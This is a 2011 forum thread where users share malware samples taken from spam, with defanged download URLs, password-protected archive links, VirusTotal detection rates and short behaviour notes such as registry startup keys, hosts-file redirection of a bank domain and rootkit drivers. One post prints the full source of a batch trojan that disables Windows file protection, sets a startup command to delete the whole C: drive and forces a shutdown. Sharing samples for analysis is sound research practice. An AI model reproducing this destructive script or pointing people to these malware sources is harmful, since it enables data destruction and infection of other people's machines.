You are not logged in. Please login or register.
[Register or log in to view the URL]
Dropped by fake VirusTotal on website hxxp://new-virustotal.tk/
WARNING: Might be alive. Do not visit !
Download:
[Register or log in to view the URL]
pass: infected
More here: [Register or log in to view the URL]
Last edited by Kobayashi (2011-05-24 15:37:31)
virus.vb.ml
at the end of infected file we get By ?? and 31 38 37 ...
like pattern is this where virus store info of file...
please check out
Following link from Yahoo spam.
hxxp://www.wartaki.pl/modules/Media_Player.exe
Media_Player.exe can be downloaded. Detection rate by VirusTotal is low (2.4 %)
[Register or log in to view the URL]
On execution Media_Player.exe drops Seguridad.exe and a startup key for this file is added to the registry.
Detection rate for this file is also low. (2.4%)
[Register or log in to view the URL]
Download both files:
[Register or log in to view the URL]
pass: infected
Last edited by Kobayashi (2011-05-23 20:08:49)
Attachment from mail FedEx mail.exe (23.8 %)
[Register or log in to view the URL]
Disables Taskmanager
A startup key is added to the registry
Downloaded from hxxp://variantov.com / dropped files:
094e5402d.exe (9.5 %)
[Register or log in to view the URL]
Adobe_Flash_Player.exe (23.8 %)
[Register or log in to view the URL]
pusk.exe (31.7 %)
[Register or log in to view the URL]
tKBeGFnootVpbn.exe (4.8 %)
[Register or log in to view the URL]
trol.exe (39.5 %)
[Register or log in to view the URL]
Download all files:
[Register or log in to view the URL]
password: infected
Last edited by Kobayashi (2011-05-25 20:09:03)
Some viruses are harmful for the computer. When we test it on the computer, More Information will be fond.
Trojan KillFiles
From Spam sent by Amor Secreto te-amo@amorr.es
Link in mail downloads from hxxp://www.alabai-montenegro.com/includes/PEAR/te-amo.exe
VirusTotal Report:
[Register or log in to view the URL]
C:\Windows\System32\drivers\etc\hosts is changed.
72.55.186.5 bancopopular.es
72.55.186.5 [Register or log in to view the URL]
[Register or log in to view the URL]
is contacted
The Volk-Panel Control System on [Register or log in to view the URL]
Download:
[Register or log in to view the URL]
password: infected
Last edited by Kobayashi (2011-05-29 14:48:13)
Trojan Otlard
New Win Lock
Detected as "Win32/Agent.SOE" by NOD32
From spam attachment DHL mail.zip.
VirusTotal (41.9 %)
[Register or log in to view the URL]
File is downloaded from hxxp://variantov.com/pusk.exe pusk[1].exe
[Register or log in to view the URL]
Task manager is disabled.
Startup key is added to the registry.
Attempts to load a system driver.
This gave a BSOD on my virtual machine.
Anybody can upload 1294.sys ?
Threatexpert:
[Register or log in to view the URL]
Anubis failed.
Download both files.
[Register or log in to view the URL]
password: infected
Last edited by Kobayashi (2011-05-31 12:02:06)
Trojan Mebroot
Attached file from Yahoo mail Tracking.zip
VirusTotal:
[Register or log in to view the URL]
A file is downloaded from hxxp://miliardov.com/pusk3.exe
Attempts to install a driver (rootkit)
Download:
[Register or log in to view the URL]
Password: infected
Last edited by Kobayashi (2011-06-01 12:46:39)
this viruses are great. (my english not good) I want fake av because thats very funny 
but I haven't five post, not download... Please share virus download Link...
From spam.
hxxp://187.61.5.26/~xsoftcom/images/FOTOS_DSC_JPG.php?0.47634
VirusTotal:
[Register or log in to view the URL]
password: infected
Wow, so much viruses over here
I downloaded all the files uploaded, is there a problem with the archives ? coz whichever file I try to download I am getting message as corrupted or damaged. Is anybody else facing the problem or its just me???
Last edited by icr (2011-07-20 17:31:49)
Some rogue program
1.Security essential 2011
2.(this one I can't recollect but its pretty nasty one coz it doesn't require restart of your system to disable your security applications and even your task manager)
Have fun testing;)
Last edited by icr (2011-07-21 20:23:50)
Trojan.Aziz:
---
::Trojan.Aziz by Gangbang 2008
@echo off
echo Aziz will fuck you all!!! > %TEMP%\aziz.reg
echo. >> %TEMP%\aziz.reg
echo ;Trojan.aziz by Gangbang >> %TEMP%\aziz.reg
echo [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> %TEMP%\aziz.reg
echo "SFCDisable"=dword:ffffff9d >> %TEMP%\aziz.reg
echo. >> %TEMP%\aziz.reg
regedit /s %TEMP%\aziz.reg
@echo off
echo. >> %TEMP%\aziz1.reg
echo ;Trojan.aziz by Gangbang >> %TEMP%\aziz1.reg
echo [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RunServices] >> %TEMP%\aziz1.reg
echo "aziz"=sz:deltree /y c:\ >> %TEMP%\aziz1.reg
echo. >> %TEMP%\aziz1.reg
regedit /s %TEMP%\aziz1.reg
shutdown -s -f -t 10 "Aziz will fuck you all..."
---
atm detected as:
AhnLab-V3 2011.07.23.00 2011.07.22 BAT/Agent
AntiVir 7.11.12.64 2011.07.22 BDS/Agent.DG.1
Antiy-AVL 2.0.3.7 2011.07.22 Trojan/BAT.Agent
Avast 4.8.1351.0 2011.07.22 VBS:Malware-gen
Avast5 5.0.677.0 2011.07.22 VBS:Malware-gen
AVG 10.0.0.1190 2011.07.23 -
BitDefender 7.2 2011.07.22 Trojan.Script.14894
CAT-QuickHeal 11.00 2011.07.22 -
ClamAV 0.97.0.0 2011.07.22 Trojan.BAT.Aziz
Commtouch 5.3.2.6 2011.07.22 -
Comodo 9473 2011.07.22 TrojWare.BAT.Agent.dg
DrWeb 5.0.2.03300 2011.07.23 -
Emsisoft 5.1.0.8 2011.07.22 Trojan.BAT.Agent!IK
eSafe 7.0.17.0 2011.07.21 -
eTrust-Vet 36.1.8459 2011.07.22 -
F-Prot 4.6.2.117 2011.07.22 -
F-Secure 9.0.16440.0 2011.07.23 Trojan.Script.14894
Fortinet 4.2.257.0 2011.07.22 -
GData 22 2011.07.22 Trojan.Script.14894
Ikarus T3.1.1.104.0 2011.07.22 Trojan.BAT.Agent
Jiangmin 13.0.900 2011.07.22 -
K7AntiVirus 9.108.4937 2011.07.22 -
Kaspersky 9.0.0.837 2011.07.23 Trojan.BAT.Agent.dg
McAfee 5.400.0.1158 2011.07.23 Unsafe Bat-b
McAfee-GW-Edition 2010.1D 2011.07.22 -
Microsoft 1.7104 2011.07.22 -
NOD32 6317 2011.07.22 -
Norman 6.07.10 2011.07.22 -
nProtect 2011-07-22.01 2011.07.22 -
Panda 10.0.3.5 2011.07.22 -
PCTools 8.0.0.5 2011.07.22 -
Prevx 3.0 2011.07.23 -
Rising 23.67.04.03 2011.07.22 -
Sophos 4.67.0 2011.07.22 Troj/Deltree-X
SUPERAntiSpyware 4.40.0.1006 2011.07.22 -
Symantec 20111.1.0.186 2011.07.22 -
TheHacker 6.7.0.1.260 2011.07.22 Bat/Generic
TrendMicro 9.200.0.1012 2011.07.22 -
TrendMicro-HouseCall 9.200.0.1012 2011.07.23 -
VBA32 3.12.16.4 2011.07.22 Trojan.BAT.Agent.dg
VIPRE 9935 2011.07.23 -
ViRobot 2011.7.22.4583 2011.07.22 -
VirusBuster 14.0.134.1 2011.07.22 -
XP 2012 Rouge application(BSA report is included)
[Register or log in to view the URL]
Password : infected
Last edited by icr (2011-07-30 21:23:16)
Some more programs that I found while surfing the internet;)
[Register or log in to view the URL]
[Register or log in to view the URL]
[Register or log in to view the URL]
[Register or log in to view the URL]
(All have corresponding BSA reports included) 
Last edited by icr (2011-07-30 21:46:13)
A nasty program on one of my clients pc, used a live cd to quarantine it due to which I was able to store it
[Register or log in to view the URL] (BSA report included)
password : infected
You can find virus on my mediafire, I update daily.
[Register or log in to view the URL]
Pass to download and decompress you can see it in the pass.txt file in Virus folder!